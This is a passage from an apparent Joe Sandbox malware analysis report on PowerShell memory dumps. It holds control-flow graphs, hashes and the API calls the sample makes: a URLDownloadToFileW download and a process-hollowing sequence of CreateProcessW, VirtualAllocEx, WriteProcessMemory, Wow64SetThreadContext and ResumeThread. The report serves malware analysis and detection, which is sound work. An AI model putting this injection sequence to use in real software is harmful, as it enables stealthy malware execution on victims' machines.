3007d8f-3007d96 72->74 73->74 75 3007da5 74->75 76 3007d98-3007d9e 74->76 75->21 76->75 77->71 78->71
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2246937583.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_3000000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 08eb69b4e214722f04c0032e4e26e2c929909b41ccad4c13c672c9275ab27a3f
                                                                                                                      • Instruction ID: bf230a99142679d311c0cc9befe83c5f4194e9d743998acd5e7c44826f84a189
                                                                                                                      • Opcode Fuzzy Hash: 08eb69b4e214722f04c0032e4e26e2c929909b41ccad4c13c672c9275ab27a3f
                                                                                                                      • Instruction Fuzzy Hash: E0E11875A01209EFDB45CF98D484A9EFBF2FF88710F248159E814AB391CB75AD81CB90

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 79 3001bf8-3007e52 83 3007e54-3007e5a 79->83 84 3007e5d-3007e63 79->84 83->84 85 3007e71-3007ea6 URLDownloadToFileW 84->85 86 3007e65-3007e6e 84->86 87 3007ea8-3007eae 85->87 88 3007eaf-3007ec3 85->88 86->85 87->88
                                                                                                                      APIs
                                                                                                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000000,?,00000001), ref: 03007E99
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2246937583.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_3000000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DownloadFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1407266417-0
                                                                                                                      • Opcode ID: f64d6a7a3450e0519d7c0e81d2cc24534775a9077cea5b964a2eeead651133e2
                                                                                                                      • Instruction ID: fdd96a84c05c819c5da467c0b1043f2a549e0785a3dad605ee7f099d1c6bbd0b
                                                                                                                      • Opcode Fuzzy Hash: f64d6a7a3450e0519d7c0e81d2cc24534775a9077cea5b964a2eeead651133e2
                                                                                                                      • Instruction Fuzzy Hash: 0B2125B1D0265AEFDB00CF99D884BDEFBF4FB48710F108519E918A3250D374AA50CBA0

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 90 7574610-757463b 91 7574af2-7574b25 90->91 92 7574641-7574646 90->92 100 7574b27-7574b33 91->100 101 7574b35 91->101 93 757465e-7574663 92->93 94 7574648-757464e 92->94 98 7574665-7574671 93->98 99 7574673 93->99 95 7574652-757465c 94->95 96 7574650 94->96 95->93 96->93 102 7574675-7574677 98->102 99->102 104 7574b37-7574b39 100->104 101->104 105 7574a93-7574a9d 102->105 106 757467d-7574687 102->106 109 7574b7b-7574b85 104->109 110 7574b3b-7574b42 104->110 107 7574a9f-7574aa8 105->107 108 7574aab-7574ab1 105->108 106->91 111 757468d-7574692 106->111 114 7574ab7-7574ac3 108->114 115 7574ab3-7574ab5 108->115 112 7574b87-7574b8b 109->112 113 7574b8e-7574b94 109->113 110->109 116 7574b44-7574b61 110->116 117 7574694-757469a 111->117 118 75746aa-75746b8 111->118 121 7574b96-7574b98 113->121 122 7574b9a-7574ba6 113->122 123 7574ac5-7574aef 114->123 115->123 128 7574b63-7574b75 116->128 129 7574bc9-7574bce 116->129 119 757469e-75746a8 117->119 120 757469c 117->120 118->105 132 75746be-75746dd 118->132 119->118 120->118 127 7574ba8-7574bc6 121->127 122->127 128->109 129->128 132->105 140 75746e3-75746ed 132->140 140->91 141 75746f3-75746f8 140->141 142 7574710-7574714 141->142 143 75746fa-7574700 141->143 142->105 144 757471a-757471e 142->144 145 7574704-757470e 143->145 146 7574702 143->146 144->105 147 7574724-7574728 144->147 145->142 146->142 147->105 149 757472e-757473e 147->149 150 75747c6-7574815 149->150 151 7574744-757476b 149->151 168 757481c-757482f 150->168 156 7574785-75747b3 151->156 157 757476d-7574773 151->157 166 75747b5-75747b7 156->166 167 75747c1-75747c4 156->167 158 7574777-7574783 157->158 159 7574775 157->159 158->156 159->156 166->167 167->168 169 75748b7-7574906 168->169 170 7574835-757485c 168->170 187 757490d-7574920 169->187 175 7574876-75748a4 170->175 176 757485e-7574864 170->176 185 75748a6-75748a8 175->185 186 75748b2-75748b5 175->186 177 7574866 176->177 178 7574868-7574874 176->178 177->175 178->175 185->186 186->187 188 7574926-757494d 187->188 189 75749a8-75749f7 187->189 194 7574967-7574995 188->194 195 757494f-7574955 188->195 206 75749fe-7574a2c 189->206 204 7574997-7574999 194->204 205 75749a3-75749a6 194->205 196 7574957 195->196 197 7574959-7574965 195->197 196->194 197->194 204->205 205->206 211 7574a2f call 3007c45 206->211 212 7574a2f call 3001bf8 206->212 213 7574a2f call 3007a08 206->213 214 7574a2f call 3007a18 206->214 215 7574a2f call 3007da8 206->215 209 7574a34-7574a90 211->209 212->209 213->209 214->209 215->209
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2251490917.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_7570000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 44b7eb6f2a6caa8ea452d5d40c736312cea8d8ac9705ad388b542baeb6538231
                                                                                                                      • Instruction ID: def24eb277a50a6a713b646622d06e79b7309f5155947c5106d8030938c481a5
                                                                                                                      • Opcode Fuzzy Hash: 44b7eb6f2a6caa8ea452d5d40c736312cea8d8ac9705ad388b542baeb6538231
                                                                                                                      • Instruction Fuzzy Hash: 8EF1E4B0B002859FDB148BA8D454BAEBBA6FFC9710F24C46AE9059B385DF71DC41CB91

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 362 75745f4-757463b 364 7574af2-7574b25 362->364 365 7574641-7574646 362->365 373 7574b27-7574b33 364->373 374 7574b35 364->374 366 757465e-7574663 365->366 367 7574648-757464e 365->367 371 7574665-7574671 366->371 372 7574673 366->372 368 7574652-757465c 367->368 369 7574650 367->369 368->366 369->366 375 7574675-7574677 371->375 372->375 377 7574b37-7574b39 373->377 374->377 378 7574a93-7574a9d 375->378 379 757467d-7574687 375->379 382 7574b7b-7574b85 377->382 383 7574b3b-7574b42 377->383 380 7574a9f-7574aa8 378->380 381 7574aab-7574ab1 378->381 379->364 384 757468d-7574692 379->384 387 7574ab7-7574ac3 381->387 388 7574ab3-7574ab5 381->388 385 7574b87-7574b8b 382->385 386 7574b8e-7574b94 382->386 383->382 389 7574b44-7574b61 383->389 390 7574694-757469a 384->390 391 75746aa-75746b8 384->391 394 7574b96-7574b98 386->394 395 7574b9a-7574ba6 386->395 396 7574ac5-7574aef 387->396 388->396 401 7574b63-7574b75 389->401 402 7574bc9-7574bce 389->402 392 757469e-75746a8 390->392 393 757469c 390->393 391->378 405 75746be-75746dd 391->405 392->391 393->391 400 7574ba8-7574bc6 394->400 395->400 401->382 402->401 405->378 413 75746e3-75746ed 405->413 413->364 414 75746f3-75746f8 413->414 415 7574710-7574714 414->415 416 75746fa-7574700 414->416 415->378 417 757471a-757471e 415->417 418 7574704-757470e 416->418 419 7574702 416->419 417->378 420 7574724-7574728 417->420 418->415 419->415 420->378 422 757472e-757473e 420->422 423 75747c6-7574815 422->423 424 7574744-757476b 422->424 441 757481c-757482f 423->441 429 7574785-75747b3 424->429 430 757476d-7574773 424->430 439 75747b5-75747b7 429->439 440 75747c1-75747c4 429->440 431 7574777-7574783 430->431 432 7574775 430->432 431->429 432->429 439->440 440->441 442 75748b7-7574906 441->442 443 7574835-757485c 441->443 460 757490d-7574920 442->460 448 7574876-75748a4 443->448 449 757485e-7574864 443->449 458 75748a6-75748a8 448->458 459 75748b2-75748b5 448->459 450 7574866 449->450 451 7574868-7574874 449->451 450->448 451->448 458->459 459->460 461 7574926-757494d 460->461 462 75749a8-75749f7 460->462 467 7574967-7574995 461->467 468 757494f-7574955 461->468 479 75749fe-7574a2c 462->479 477 7574997-7574999 467->477 478 75749a3-75749a6 467->478 469 7574957 468->469 470 7574959-7574965 468->470 469->467 470->467 477->478 478->479 484 7574a2f call 3007c45 479->484 485 7574a2f call 3001bf8 479->485 486 7574a2f call 3007a08 479->486 487 7574a2f call 3007a18 479->487 488 7574a2f call 3007da8 479->488 482 7574a34-7574a90 484->482 485->482 486->482 487->482 488->482
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2251490917.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_7570000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b67145d4164854f90569fad4aec23e1349c200323f435f9b650db9ac6867beaf
                                                                                                                      • Instruction ID: 2b0e9705c48f68e19e2b87514b911e9aae3f88b2e95921c9c3af27a70aa7b06d
                                                                                                                      • Opcode Fuzzy Hash: b67145d4164854f90569fad4aec23e1349c200323f435f9b650db9ac6867beaf
                                                                                                                      • Instruction Fuzzy Hash: 9691C1B4B002869FDB14CF58D440BA9BBB6FF89710F25C46AE905AB394DB71EC41CB91

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 536 75704f8-757050a 537 7570510-7570521 536->537 538 75705ca-75705fd 536->538 542 7570523-7570529 537->542 543 757053b-7570558 537->543 544 75705ff-757063e 538->544 545 757066b-7570675 538->545 546 757052d-7570539 542->546 547 757052b 542->547 543->538 552 757055a-757057c 543->552 566 7570640-757064e 544->566 567 75706bb-75706c0 544->567 549 7570677-757067d 545->549 550 7570680-7570686 545->550 546->543 547->543 554 757068c-7570698 550->554 555 7570688-757068a 550->555 561 7570596-75705ae 552->561 562 757057e-7570584 552->562 556 757069a-75706b8 554->556 555->556 571 75705b0-75705b2 561->571 572 75705bc-75705c7 561->572 564 7570586 562->564 565 7570588-7570594 562->565 564->561 565->561 575 7570656-7570665 566->575 567->566 571->572 575->545
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2251490917.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_7570000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 531062e85fa31c76fe4f24a8bd21388da1bbcff841decc78c913b6c1a82a0f86
                                                                                                                      • Instruction ID: a355823a6591e3ce5e042de20de85dd82312c6171f8ec7391d3bd4198868aac8
                                                                                                                      • Opcode Fuzzy Hash: 531062e85fa31c76fe4f24a8bd21388da1bbcff841decc78c913b6c1a82a0f86
                                                                                                                      • Instruction Fuzzy Hash: 7C5133B1B002559FDB209B68A810BAABBE6BFC5710F54846AE549DF3C1CA71DC01C7A2

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 727 757205c-757207c 728 75720c2-75720f5 727->728 729 757207e-7572099 727->729 739 75720fc-7572105 728->739 732 75720b3-75720b7 729->732 733 757209b-75720a1 729->733 737 75720be-75720c0 732->737 735 75720a5-75720b1 733->735 736 75720a3 733->736 735->732 736->732 737->739
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2251490917.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_7570000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c67b2656a96128fe4809fb21f424d99a3ca51301dc969eb460ca8486ed4c6397
                                                                                                                      • Instruction ID: c261272982caa93828c2c43889ea6add54009aa96b0839039822428890173e17
                                                                                                                      • Opcode Fuzzy Hash: c67b2656a96128fe4809fb21f424d99a3ca51301dc969eb460ca8486ed4c6397
                                                                                                                      • Instruction Fuzzy Hash: 2E012BF1B042919BE71153781C117DD7625BFC1A55F1401BAC540DF681DB708D06C3E7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2246341078.0000000002E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E0D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_2e0d000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: adb7a7199227302a043e11c164921113be2fc20e58642cbf21b65381d935846e
                                                                                                                      • Instruction ID: c5f48f62a2153529def430dcf25cf9d353d9c45ed9b285adaa160a24b66729c3
                                                                                                                      • Opcode Fuzzy Hash: adb7a7199227302a043e11c164921113be2fc20e58642cbf21b65381d935846e
                                                                                                                      • Instruction Fuzzy Hash: 04010C6244E3C09EE7128B259D94B52BFB4DF47228F19C1DBD9888F1E3C269584AC772
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.2246341078.0000000002E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E0D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_2e0d000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 007719c72a83a4d122ba3c35fcc396f6cc394b3e1f95aa1464a88675e36f49de
                                                                                                                      • Instruction ID: 70672917b00d43e413491d3faee49c2fb02fc47abbd9991e46eda1f36d56ac3d
                                                                                                                      • Opcode Fuzzy Hash: 007719c72a83a4d122ba3c35fcc396f6cc394b3e1f95aa1464a88675e36f49de
                                                                                                                      • Instruction Fuzzy Hash: C101F2715493409AE7104AA5DDC0F66BF98DF41328F18D01AED4C4A2C2C7B89882C7B1

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:5%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:88.5%
                                                                                                                      Total number of Nodes:26
                                                                                                                      Total number of Limit Nodes:1
                                                                                                                      execution_graph 8551 42487b0 8552 424882d 8551->8552 8562 4248eb4 8552->8562 8575 42472f0 8552->8575 8554 4249095 CreateProcessW 8557 4249109 8554->8557 8555 42488b8 8556 42472fc Wow64SetThreadContext 8555->8556 8555->8562 8559 4248923 8556->8559 8558 4248da8 8559->8558 8560 4248a36 VirtualAllocEx 8559->8560 8559->8562 8561 4248a83 8560->8561 8561->8562 8563 4248ad1 VirtualAllocEx 8561->8563 8564 4248b25 8561->8564 8562->8554 8562->8558 8563->8564 8564->8558 8564->8562 8565 4247314 WriteProcessMemory 8564->8565 8568 4248b6f 8565->8568 8566 4248cb9 8566->8562 8567 4247314 WriteProcessMemory 8566->8567 8569 4248ce2 8567->8569 8568->8558 8568->8562 8568->8566 8574 4247314 WriteProcessMemory 8568->8574 8569->8558 8569->8562 8570 4247320 Wow64SetThreadContext 8569->8570 8571 4248d57 8570->8571 8571->8562 8572 4248d5f 8571->8572 8572->8558 8573 4248d68 ResumeThread 8572->8573 8573->8558 8574->8568 8576 4248fb0 CreateProcessW 8575->8576 8578 4249109 8576->8578

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 42487b0-4248861 4 4248867-4248877 0->4 5 4248f99-4249029 0->5 9 4248880 4->9 10 4248879-424887e 4->10 12 4249031-4249038 5->12 13 424902b-424902e 5->13 11 4248882-4248884 9->11 10->11 14 4248886-4248899 11->14 15 424889b-42488ba call 42472f0 11->15 16 4249043-4249059 12->16 17 424903a-4249040 12->17 13->12 14->15 23 42488c3 15->23 24 42488bc-42488c1 15->24 19 4249064-4249107 CreateProcessW 16->19 20 424905b-4249061 16->20 17->16 27 4249110-4249188 19->27 28 4249109-424910f 19->28 20->19 26 42488c5-42488c7 23->26 24->26 29 42488cd-42488e2 26->29 30 4248f0f-4248f22 26->30 48 424919a-42491a1 27->48 49 424918a-4249190 27->49 28->27 36 42488e8-424890c 29->36 37 4248f0a 29->37 41 4248f29-4248f3f 30->41 36->41 44 4248912-4248925 call 42472fc 36->44 37->30 41->5 54 4248f41-4248f4b 41->54 55 4248ead-4248eaf 44->55 56 424892b-4248932 44->56 51 42491a3-42491b2 48->51 52 42491b8 48->52 49->48 51->52 57 42491b9 52->57 63 4248f56-4248f58 54->63 64 4248f4d-4248f54 54->64 58 4248e93-4248ea6 56->58 59 4248938-4248942 56->59 57->57 58->55 59->41 62 4248948-4248965 59->62 62->37 66 424896b-4248985 call 4247308 62->66 67 4248f5a-4248f5e 63->67 64->67 74 4248eb4 66->74 75 424898b-4248992 66->75 69 4248f65-4248f72 67->69 70 4248f60 call 4247f80 67->70 86 4248f79-4248f96 69->86 70->69 81 4248ebb 74->81 77 4248998-42489a1 75->77 78 4248e79-4248e8c 75->78 79 42489a3-42489e7 77->79 80 4248a0c-4248a12 77->80 78->58 88 42489f0-42489fc 79->88 89 42489e9-42489ef 79->89 80->37 83 4248a18-4248a28 80->83 85 4248ec5 81->85 83->37 94 4248a2e-4248a81 VirtualAllocEx 83->94 92 4248ecc 85->92 88->81 93 4248a02-4248a06 88->93 89->88 97 4248ed3 92->97 93->80 96 4248e5f-4248e72 93->96 100 4248a83-4248a89 94->100 101 4248a8a-4248aa8 94->101 96->78 103 4248eda 97->103 100->101 101->85 102 4248aae-4248ab5 101->102 104 4248b3c-4248b43 102->104 105 4248abb-4248ac2 102->105 110 4248ee1 103->110 104->97 109 4248b49-4248b50 104->109 105->92 108 4248ac8-4248acf 105->108 108->104 111 4248ad1-4248b23 VirtualAllocEx 108->111 112 4248e45-4248e58 109->112 113 4248b56-4248b71 call 4247314 109->113 117 4248eeb 110->117 114 4248b25-4248b2b 111->114 115 4248b2c-4248b36 111->115 112->96 113->103 121 4248b77-4248b7e 113->121 114->115 115->104 122 4248ef2 117->122 124 4248b84-4248b8d 121->124 125 4248e2b-4248e3e 121->125 127 4248ef9 122->127 124->37 126 4248b93-4248b99 124->126 125->112 126->37 128 4248b9f-4248baa 126->128 130 4248f03 127->130 128->37 133 4248bb0-4248bb6 128->133 130->37 134 4248bbc-4248bc1 133->134 135 4248cb9-4248cca 133->135 134->37 136 4248bc7-4248bda 134->136 135->37 138 4248cd0-4248ce4 call 4247314 135->138 136->37 141 4248be0-4248bf3 136->141 138->122 143 4248cea-4248cf1 138->143 141->37 147 4248bf9-4248c0e 141->147 145 4248df7-4248e0a 143->145 146 4248cf7-4248cfd 143->146 162 4248e11-4248e24 145->162 146->37 148 4248d03-4248d14 146->148 147->110 152 4248c14-4248c18 147->152 148->127 154 4248d1a-4248d1e 148->154 155 4248c1e-4248c27 152->155 156 4248c9f-4248ca2 152->156 158 4248d20-4248d23 154->158 159 4248d29-4248d31 154->159 155->37 157 4248c2d-4248c30 155->157 156->37 160 4248ca8-4248cab 156->160 157->37 161 4248c36-4248c66 157->161 158->159 159->37 163 4248d37-4248d41 159->163 160->37 164 4248cb1-4248cb3 160->164 161->37 175 4248c6c-4248c85 call 4247314 161->175 162->125 163->41 165 4248d47-4248d59 call 4247320 163->165 164->134 164->135 165->130 172 4248d5f-4248d66 165->172 173 4248dc3-4248dd6 172->173 174 4248d68-4248da6 ResumeThread 172->174 179 4248ddd-4248df0 173->179 176 4248daf-4248dbc 174->176 177 4248da8-4248dae 174->177 182 4248c8a-4248c8c 175->182 176->179 180 4248dbe-4248f74 176->180 177->176 179->145 180->86 182->117 185 4248c92-4248c99 182->185 185->156 185->162
                                                                                                                      APIs
                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 04248A6A
                                                                                                                      • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 04248B0C
                                                                                                                        • Part of subcall function 04247314: WriteProcessMemory.KERNELBASE(?,00000000,00000000,18492514,00000000,?,?,?,00000000,00000000,?,04248B6F,?,00000000,?), ref: 042493E4
                                                                                                                      • ResumeThread.KERNELBASE(?), ref: 04248D8F
                                                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 042490F4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.2484720898.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_4240000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4270437565-0
                                                                                                                      • Opcode ID: 3aadd1ccbbda675ecdfdf7abc004b954fe45abaa9776c5c9dee376d70db420fc
                                                                                                                      • Instruction ID: 7f18cb8891af67d20c9c1e04e4b5b0451d635e84e83e3f93d12b2b995ed3fc83
                                                                                                                      • Opcode Fuzzy Hash: 3aadd1ccbbda675ecdfdf7abc004b954fe45abaa9776c5c9dee376d70db420fc
                                                                                                                      • Instruction Fuzzy Hash: D842A274B2021ACFEB29DF64C85479EB7F2EF84344F1484A9D909AB290DB74AD84CF51

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 555 4247ff4-42482a5 556 42482a7-42482a9 555->556 557 42482ae-42482be 555->557 558 424857a-4248581 556->558 559 42482c5-42482d5 557->559 560 42482c0 557->560 562 4248561-424856f 559->562 563 42482db-42482e9 559->563 560->558 566 4248582-42485fd 562->566 568 4248571-4248575 call 4241cf0 562->568 563->566 567 42482ef 563->567 567->566 569 4248385-42483a6 567->569 570 42484e6-4248512 567->570 571 424844a-4248472 567->571 572 42483ab-42483cc 567->572 573 4248514-424852f call 4240318 567->573 574 4248555-424855f 567->574 575 42482f6-4248305 567->575 576 42483f7-4248418 567->576 577 4248477-42484b6 567->577 578 42483d1-42483f2 567->578 579 4248531-4248553 567->579 580 424841d-4248445 567->580 581 424835e-4248380 567->581 582 4248338-4248359 567->582 583 42484bb-42484e1 567->583 568->558 569->558 570->558 571->558 572->558 573->558 574->558 603 4248307-424831c 575->603 604 424831e-424832d 575->604 576->558 577->558 578->558 579->558 580->558 581->558 582->558 583->558 631 4248333 603->631 604->631 631->558
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.2484720898.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_4240000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 09f02b45c3fc5a877314a109d3ad0a03b071a608636219c230425cd51d1f9e2c
                                                                                                                      • Instruction ID: 7df2dc0e4e09389f34aabb61a88117d71bd48ef8f4bf068247e990e11e07aa24
                                                                                                                      • Opcode Fuzzy Hash: 09f02b45c3fc5a877314a109d3ad0a03b071a608636219c230425cd51d1f9e2c
                                                                                                                      • Instruction Fuzzy Hash: DF917E38B202598BDB1CAB75985477E7BA2FFC8740F05C52DE407E7284DE74AC829791

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 189 42472f0-4249029 191 4249031-4249038 189->191 192 424902b-424902e 189->192 193 4249043-4249059 191->193 194 424903a-4249040 191->194 192->191 195 4249064-4249107 CreateProcessW 193->195 196 424905b-4249061 193->196 194->193 198 4249110-4249188 195->198 199 4249109-424910f 195->199 196->195 206 424919a-42491a1 198->206 207 424918a-4249190 198->207 199->198 208 42491a3-42491b2 206->208 209 42491b8 206->209 207->206 208->209 210 42491b9 209->210 210->210
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 042490F4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.2484720898.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_4240000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: e6453ee66b34926e588f80a1e58e191adc0155a332d11d0edc8fc34089087fac
                                                                                                                      • Instruction ID: 6f61246cf0ded8617b9aa51a739bab03665a4c580502c964ba4aa79d70049357
                                                                                                                      • Opcode Fuzzy Hash: e6453ee66b34926e588f80a1e58e191adc0155a332d11d0edc8fc34089087fac
                                                                                                                      • Instruction Fuzzy Hash: 4951F87190121ADFDF24CFA9C944BDEBBB5FB48304F1085AAE909B7250DB75AA84CF50

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 212 4249360-42493ae 214 42493b0-42493b6 212->214 215 42493b8-42493f1 WriteProcessMemory 212->215 214->215 216 42493f3-42493f9 215->216 217 42493fa-424941b 215->217 216->217
                                                                                                                      APIs
                                                                                                                      • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18492514,00000000,?,?,?,00000000,00000000,?,04248B6F,?,00000000,?), ref: 042493E4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.2484720898.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_4240000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3559483778-0
                                                                                                                      • Opcode ID: 08d3de08ed8c726840a76a6c43df677f5221c28342f85cf496332b0e60b02081
                                                                                                                      • Instruction ID: e56fcca0f22430258ee23a443802d35d2ce0415f467ab9998d06d5dafe45a319
                                                                                                                      • Opcode Fuzzy Hash: 08d3de08ed8c726840a76a6c43df677f5221c28342f85cf496332b0e60b02081
                                                                                                                      • Instruction Fuzzy Hash: B42128B1911349DFDB10CFA9C984BDEFBF8FB49324F14842AE554A7250D378A544CBA1

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 219 4247314-42493ae 221 42493b0-42493b6 219->221 222 42493b8-42493f1 WriteProcessMemory 219->222 221->222 223 42493f3-42493f9 222->223 224 42493fa-424941b 222->224 223->224
                                                                                                                      APIs
                                                                                                                      • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18492514,00000000,?,?,?,00000000,00000000,?,04248B6F,?,00000000,?), ref: 042493E4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.2484720898.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_4240000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3559483778-0
                                                                                                                      • Opcode ID: f2605c7e12510f76228f5e08cc0625029c7fd2ca2d1590366f4a1d96a03a478c
                                                                                                                      • Instruction ID: 627334cbd14ef3cff2c55e1623fe4b0a14580191d7b0798410507d597d4849b4
                                                                                                                      • Opcode Fuzzy Hash: f2605c7e12510f76228f5e08cc0625029c7fd2ca2d1590366f4a1d96a03a478c
                                                                                                                      • Instruction Fuzzy Hash: 5921D8B1910309DFDB10CFA9C984BDEFBF4FB49324F508429E515A7250D378A944CBA5

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 240 42491e8-4249230 242 4249232-424923a 240->242 243 424923c-4249268 Wow64SetThreadContext 240->243 242->243 244 4249271-4249292 243->244 245 424926a-4249270 243->245 245->244
                                                                                                                      APIs
                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04248923), ref: 0424925B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000008.00000002.2484720898.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_8_2_4240000_powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 983334009-0
                                                                                                                      • Opcode ID: 89d565a489cd638724555b1291201bccdac0d96965b6b0f6970bfe017e89e338
                                                                                                                      • Instruction ID: e5d88961c442149ebabffdf3c5b4d5595ee933e8987977afc916134cd6c9a898
